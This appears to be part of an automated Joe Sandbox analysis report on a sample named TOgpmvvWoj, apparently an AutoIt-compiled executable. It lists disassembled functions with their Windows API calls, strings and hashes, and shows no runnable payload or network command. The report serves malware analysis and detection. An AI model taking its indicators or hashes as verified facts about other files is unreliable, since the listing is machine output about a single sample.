                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                            • String ID: 0
                                            • API String ID: 464785882-4108050209
                                            • Opcode ID: efdc1efccf3350ef2f1aa991bbf5bfd0535c7329e92cd68da55b756d80db9b2d
                                            • Instruction ID: a35a155bc9169fa833ee470e29c4b22750933fbc134b72c1e119ade8afef33f5
                                            • Opcode Fuzzy Hash: efdc1efccf3350ef2f1aa991bbf5bfd0535c7329e92cd68da55b756d80db9b2d
                                            • Instruction Fuzzy Hash: E1129030601201EFDB54CF24D888BA9B7E5FF44304F64656EEA96EB262C731EC91DB91
                                            Function 00E877BE Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 284windowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • DestroyWindow.USER32(00000000), ref: 00E877F1
                                            • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00E878B0
                                            • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 00E878EE
                                            • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 00E87900
                                            • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00E87946
                                            • GetClientRect.USER32(00000000,?), ref: 00E87952
                                            • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00E87996
                                            • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00E879A5
                                            • GetStockObject.GDI32(00000011), ref: 00E879B5
                                            • SelectObject.GDI32(00000000,00000000), ref: 00E879B9
                                            • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 00E879C9
                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00E879D2
                                            • DeleteDC.GDI32(00000000), ref: 00E879DB
                                            • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00E87A07
                                            • SendMessageW.USER32(00000030,00000000,00000001), ref: 00E87A1E
                                            • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00E87A59
                                            • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00E87A6D
                                            • SendMessageW.USER32(00000404,00000001,00000000), ref: 00E87A7E
                                            • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 00E87AAE
                                            • GetStockObject.GDI32(00000011), ref: 00E87AB9
                                            • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00E87AC4
                                            • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 00E87ACE
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                            • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                            • API String ID: 2910397461-517079104
                                            • Opcode ID: dbe06263526c1cb3aabfad74da4dd69e6b6391fa8fa7df433d50e3853bd2965f
                                            • Instruction ID: ab08198a11e94c914e579f2c6b54802d58373ea579a88fc8e2455738f28eb050
                                            • Opcode Fuzzy Hash: dbe06263526c1cb3aabfad74da4dd69e6b6391fa8fa7df433d50e3853bd2965f
                                            • Instruction Fuzzy Hash: 21A17F71A40215BFEB149BA5DC4AFAEBBB9EB48710F104116FA19F72E1C770AD04CB60
                                            Function 00E7AF7B Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 186COMMON
                                            Download Yara Rule
                                            APIs
                                            • SetErrorMode.KERNEL32(00000001), ref: 00E7AF89
                                            • GetDriveTypeW.KERNEL32(?,00E9FAC0,?,\\.\,00E9F910), ref: 00E7B066
                                            • SetErrorMode.KERNEL32(00000000,00E9FAC0,?,\\.\,00E9F910), ref: 00E7B1C4
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: ErrorMode$DriveType
                                            • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                            • API String ID: 2907320926-4222207086
                                            • Opcode ID: 5aa162132c0e009440380a46ea123384e1a65b2f8f0d486695e5b03d497d1edc
                                            • Instruction ID: efa796e6840883991e48e9704d269ff8e56f73b16ddedf1b87ec2de1a8497c0a
                                            • Opcode Fuzzy Hash: 5aa162132c0e009440380a46ea123384e1a65b2f8f0d486695e5b03d497d1edc
                                            • Instruction Fuzzy Hash: 9551D070685349EB8B04DB10CAA6FFD73B0BB54749768F02AE40EB7691C7369D42DB42
                                            Function 00E16A3C Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 275COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: __wcsnicmp
                                            • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                            • API String ID: 1038674560-86951937
                                            • Opcode ID: 8a40e9bc9d8679f81242d1cc77bd911e8ee6f2a2b6dc33526f3c417860bb3242
                                            • Instruction ID: ebdb1f017fcc4288b70e8c26cd310edf2c01b24870d0f8fb4f8b70e8bd83ff48
                                            • Opcode Fuzzy Hash: 8a40e9bc9d8679f81242d1cc77bd911e8ee6f2a2b6dc33526f3c417860bb3242
                                            • Instruction Fuzzy Hash: 4D812671644305BACB20AF24DC86FEE7BE8BF15718F047065F945BA182EB60EA91C291
                                            Function 00E9AB60 Relevance: 39.2, APIs: 26, Instructions: 201windowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • GetSysColor.USER32(00000012), ref: 00E9AB99
                                            • SetTextColor.GDI32(?,?), ref: 00E9AB9D
                                            • GetSysColorBrush.USER32(0000000F), ref: 00E9ABB3
                                            • GetSysColor.USER32(0000000F), ref: 00E9ABBE
                                            • CreateSolidBrush.GDI32(?), ref: 00E9ABC3
                                            • GetSysColor.USER32(00000011), ref: 00E9ABDB
                                            • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00E9ABE9
                                            • SelectObject.GDI32(?,00000000), ref: 00E9ABFA
                                            • SetBkColor.GDI32(?,00000000), ref: 00E9AC03
                                            • SelectObject.GDI32(?,?), ref: 00E9AC10
                                            • InflateRect.USER32(?,000000FF,000000FF), ref: 00E9AC2F
                                            • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00E9AC46
                                            • GetWindowLongW.USER32(00000000,000000F0), ref: 00E9AC5B
                                            • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00E9ACA7
                                            • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00E9ACCE
                                            • InflateRect.USER32(?,000000FD,000000FD), ref: 00E9ACEC
                                            • DrawFocusRect.USER32(?,?), ref: 00E9ACF7
                                            • GetSysColor.USER32(00000011), ref: 00E9AD05
                                            • SetTextColor.GDI32(?,00000000), ref: 00E9AD0D
                                            • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 00E9AD21
                                            • SelectObject.GDI32(?,00E9A869), ref: 00E9AD38
                                            • DeleteObject.GDI32(?), ref: 00E9AD43
                                            • SelectObject.GDI32(?,?), ref: 00E9AD49
                                            • DeleteObject.GDI32(?), ref: 00E9AD4E
                                            • SetTextColor.GDI32(?,?), ref: 00E9AD54
                                            • SetBkColor.GDI32(?,?), ref: 00E9AD5E
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                            • String ID:
                                            • API String ID: 1996641542-0
                                            • Opcode ID: 39c8f3336d1e86a9c5a92d2f31ccb5b38c47cb268e8d2d5e5fb73f3c2270cf94
                                            • Instruction ID: 7575cd53636d400ee3db6043e0fc0fcd677cc0e11275b621dca098881873ca3c
                                            • Opcode Fuzzy Hash: 39c8f3336d1e86a9c5a92d2f31ccb5b38c47cb268e8d2d5e5fb73f3c2270cf94
                                            • Instruction Fuzzy Hash: 66615C71901218EFDF119FA9DC48AEEBBB9EF08320F254126F915FB2A1D6719D40DB90
                                            Function 00E98C44 Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 401windowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00E98D34
                                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00E98D45
                                            • CharNextW.USER32(0000014E), ref: 00E98D74
                                            • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00E98DB5
                                            • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00E98DCB
                                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00E98DDC
                                            • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00E98DF9
                                            • SetWindowTextW.USER32(?,0000014E), ref: 00E98E45
                                            • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00E98E5B
                                            • SendMessageW.USER32(?,00001002,00000000,?), ref: 00E98E8C
                                            • _memset.LIBCMT ref: 00E98EB1
                                            • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00E98EFA
                                            • _memset.LIBCMT ref: 00E98F59
                                            • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00E98F83
                                            • SendMessageW.USER32(?,00001074,?,00000001), ref: 00E98FDB
                                            • SendMessageW.USER32(?,0000133D,?,?), ref: 00E99088
                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 00E990AA
                                            • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00E990F4
                                            • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00E99121
                                            • DrawMenuBar.USER32(?), ref: 00E99130
                                            • SetWindowTextW.USER32(?,0000014E), ref: 00E99158
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                            • String ID: 0
                                            • API String ID: 1073566785-4108050209
                                            • Opcode ID: a62addfed4f6c4f46f61a0ab70a72c1c62a5c9838b70a40baa53b9e30f789ed4
                                            • Instruction ID: fb21eb8d23daa45e1fe1db2a8392503e40b988db2d80470fbb847280c226042e
                                            • Opcode Fuzzy Hash: a62addfed4f6c4f46f61a0ab70a72c1c62a5c9838b70a40baa53b9e30f789ed4
                                            • Instruction Fuzzy Hash: 6EE1A270901209AFDF209F65CC88EEE7BB9FF05714F10915AF915BA2A1DB708A85DF60
                                            Function 00E94B16 Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • GetCursorPos.USER32(?), ref: 00E94C51
                                            • GetDesktopWindow.USER32 ref: 00E94C66
                                            • GetWindowRect.USER32(00000000), ref: 00E94C6D
                                            • GetWindowLongW.USER32(?,000000F0), ref: 00E94CCF
                                            • DestroyWindow.USER32(?), ref: 00E94CFB
                                            • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00E94D24
                                            • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00E94D42
                                            • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00E94D68
                                            • SendMessageW.USER32(?,00000421,?,?), ref: 00E94D7D
                                            • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00E94D90
                                            • IsWindowVisible.USER32(?), ref: 00E94DB0
                                            • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00E94DCB
                                            • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00E94DDF
                                            • GetWindowRect.USER32(?,?), ref: 00E94DF7
                                            • MonitorFromPoint.USER32(?,?,00000002), ref: 00E94E1D
                                            • GetMonitorInfoW.USER32(00000000,?), ref: 00E94E37
                                            • CopyRect.USER32(?,?), ref: 00E94E4E
                                            • SendMessageW.USER32(?,00000412,00000000), ref: 00E94EB9
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                            • String ID: ($0$tooltips_class32
                                            • API String ID: 698492251-4156429822
                                            • Opcode ID: 8dc5277600c526a6fc1cf1993f278eecd11386de29b3d4c0cc460281f801b2ec
                                            • Instruction ID: 5e4a4f91da3349ce79e23ba675959ade933e860da35e5b923f06b10c364e01c0
                                            • Opcode Fuzzy Hash: 8dc5277600c526a6fc1cf1993f278eecd11386de29b3d4c0cc460281f801b2ec
                                            • Instruction Fuzzy Hash: 07B158B1604340AFDB04DF65C849FAABBE4BF88314F00991DF599AB2A2D771EC45CB91
                                            Function 00E746D6 Relevance: 36.9, APIs: 16, Strings: 5, Instructions: 179COMMON
                                            Download Yara Rule
                                            APIs
                                            • GetFileVersionInfoSizeW.VERSION(?,?), ref: 00E746E8
                                            • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 00E7470E
                                            • _wcscpy.LIBCMT ref: 00E7473C
                                            • _wcscmp.LIBCMT ref: 00E74747
                                            • _wcscat.LIBCMT ref: 00E7475D
                                            • _wcsstr.LIBCMT ref: 00E74768
                                            • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00E74784
                                            • _wcscat.LIBCMT ref: 00E747CD
                                            • _wcscat.LIBCMT ref: 00E747D4
                                            • _wcsncpy.LIBCMT ref: 00E747FF
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                                            • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                            • API String ID: 699586101-1459072770
                                            • Opcode ID: 7e087d0e888b0996fb6c84b8d9023f9144a39f24092ab38b2a33c1f019e72900
                                            • Instruction ID: fc6575abcabc109f5e8ad47a370a132841fd2ccd0b1b828ab24142ce259cae65
                                            • Opcode Fuzzy Hash: 7e087d0e888b0996fb6c84b8d9023f9144a39f24092ab38b2a33c1f019e72900
                                            • Instruction Fuzzy Hash: BC410771A003147AEB14A7749C4BEBF7BECDF41710F04606AF909F61C2EB759A01D6A5
                                            Function 00E127D9 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 286windowtimeCOMMON
                                            Download Yara Rule
                                            APIs
                                            • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00E128BC
                                            • GetSystemMetrics.USER32(00000007), ref: 00E128C4
                                            • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00E128EF
                                            • GetSystemMetrics.USER32(00000008), ref: 00E128F7
                                            • GetSystemMetrics.USER32(00000004), ref: 00E1291C
                                            • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00E12939
                                            • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00E12949
                                            • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00E1297C
                                            • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00E12990
                                            • GetClientRect.USER32(00000000,000000FF), ref: 00E129AE
                                            • GetStockObject.GDI32(00000011), ref: 00E129CA
                                            • SendMessageW.USER32(00000000,00000030,00000000), ref: 00E129D5
                                              • Part of subcall function 00E12344: GetCursorPos.USER32(?), ref: 00E12357
                                              • Part of subcall function 00E12344: ScreenToClient.USER32(00ED67B0,?), ref: 00E12374
                                              • Part of subcall function 00E12344: GetAsyncKeyState.USER32(00000001), ref: 00E12399
                                              • Part of subcall function 00E12344: GetAsyncKeyState.USER32(00000002), ref: 00E123A7
                                            • SetTimer.USER32(00000000,00000000,00000028,00E11256), ref: 00E129FC
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                            • String ID: AutoIt v3 GUI
                                            • API String ID: 1458621304-248962490
                                            • Opcode ID: e7ce1eb357b56a023cf23e3812753d6bfeda90c6ee4232f9636783ad6dcddd75
                                            • Instruction ID: 98efb1b1a763e1499ff8644df6351fdf6676ec78f80ebae2518f42d721cfa960
                                            • Opcode Fuzzy Hash: e7ce1eb357b56a023cf23e3812753d6bfeda90c6ee4232f9636783ad6dcddd75
                                            • Instruction Fuzzy Hash: 22B15971A0120AAFDB14DFA9DC45BEE7BB4FB48314F10912AFA15F72A0DB74A851CB50
                                            Function 00E94069 Relevance: 28.3, APIs: 3, Strings: 13, Instructions: 283windowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • CharUpperBuffW.USER32(?,?), ref: 00E940F6
                                            • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00E941B6
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: BuffCharMessageSendUpper
                                            • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                            • API String ID: 3974292440-719923060
                                            • Opcode ID: 612675bff6981203945eb14fa8db64b3051b3457d7e0c7f7f273e822374715ac
                                            • Instruction ID: a066f83402a00ae378b8f79db5bbcbc89ce611e5fad99d2f571c4a737d48cf5e
                                            • Opcode Fuzzy Hash: 612675bff6981203945eb14fa8db64b3051b3457d7e0c7f7f273e822374715ac
                                            • Instruction Fuzzy Hash: E4A160702143019BCB14EF20C952EAAB7E9BF84314F14696DB896BB7D2DB31EC46CB51
                                            Function 00E852F0 Relevance: 27.1, APIs: 18, Instructions: 124COMMON
                                            Download Yara Rule
                                            APIs
                                            • LoadCursorW.USER32(00000000,00007F89), ref: 00E85309
                                            • LoadCursorW.USER32(00000000,00007F8A), ref: 00E85314
                                            • LoadCursorW.USER32(00000000,00007F00), ref: 00E8531F
                                            • LoadCursorW.USER32(00000000,00007F03), ref: 00E8532A
                                            • LoadCursorW.USER32(00000000,00007F8B), ref: 00E85335
                                            • LoadCursorW.USER32(00000000,00007F01), ref: 00E85340
                                            • LoadCursorW.USER32(00000000,00007F81), ref: 00E8534B
                                            • LoadCursorW.USER32(00000000,00007F88), ref: 00E85356
                                            • LoadCursorW.USER32(00000000,00007F80), ref: 00E85361
                                            • LoadCursorW.USER32(00000000,00007F86), ref: 00E8536C
                                            • LoadCursorW.USER32(00000000,00007F83), ref: 00E85377
                                            • LoadCursorW.USER32(00000000,00007F85), ref: 00E85382
                                            • LoadCursorW.USER32(00000000,00007F82), ref: 00E8538D
                                            • LoadCursorW.USER32(00000000,00007F84), ref: 00E85398
                                            • LoadCursorW.USER32(00000000,00007F04), ref: 00E853A3
                                            • LoadCursorW.USER32(00000000,00007F02), ref: 00E853AE
                                            • GetCursorInfo.USER32(?), ref: 00E853BE
                                            • GetLastError.KERNEL32(00000001,00000000), ref: 00E853E9
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: Cursor$Load$ErrorInfoLast
                                            • String ID:
                                            • API String ID: 3215588206-0
                                            • Opcode ID: 43268cd1766c35e649c50be2f85b731f5693b23413469ee829e4f00525d9c5d2
                                            • Instruction ID: ae54c0ba95087e96b369f9573310f98bdb524b7ec230fcbbcbfd5dc4688a7090
                                            • Opcode Fuzzy Hash: 43268cd1766c35e649c50be2f85b731f5693b23413469ee829e4f00525d9c5d2
                                            • Instruction Fuzzy Hash: E8417370E443196ADB10AFBA8C4986EFFF8EF51B50B10452FE51DF7291DAB8A4008F51
                                            Function 00E6AA64 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON
                                            Download Yara Rule
                                            APIs
                                            • GetClassNameW.USER32(?,?,00000100), ref: 00E6AAA5
                                            • __swprintf.LIBCMT ref: 00E6AB46
                                            • _wcscmp.LIBCMT ref: 00E6AB59
                                            • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00E6ABAE
                                            • _wcscmp.LIBCMT ref: 00E6ABEA
                                            • GetClassNameW.USER32(?,?,00000400), ref: 00E6AC21
                                            • GetDlgCtrlID.USER32(?), ref: 00E6AC73
                                            • GetWindowRect.USER32(?,?), ref: 00E6ACA9
                                            • GetParent.USER32(?), ref: 00E6ACC7
                                            • ScreenToClient.USER32(00000000), ref: 00E6ACCE
                                            • GetClassNameW.USER32(?,?,00000100), ref: 00E6AD48
                                            • _wcscmp.LIBCMT ref: 00E6AD5C
                                            • GetWindowTextW.USER32(?,?,00000400), ref: 00E6AD82
                                            • _wcscmp.LIBCMT ref: 00E6AD96
